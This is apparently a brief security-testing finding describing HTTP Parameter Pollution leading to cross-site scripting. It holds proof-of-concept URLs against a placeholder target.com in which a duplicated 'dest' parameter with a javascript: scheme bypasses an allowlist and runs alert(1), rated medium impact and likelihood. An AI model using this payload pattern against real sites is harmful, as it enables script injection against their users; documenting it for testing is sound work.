V5 - Validation/Sanitization
HTTP Parameter Pollution to XSS
POC
See the common payloads below while testing: https://target.com/endpoint.aspx?dest=data://whitelistedWebsite.com → Accepted https://target.com/endpoint.aspx?dest=http://google.com → not Accepted https://target.com/endpoint.aspx?dest=javascript:/whitelistedWebsite.com/i&dest=alert(1) Observe exploitation of XSS
Impact
Medium
Likelihood
Medium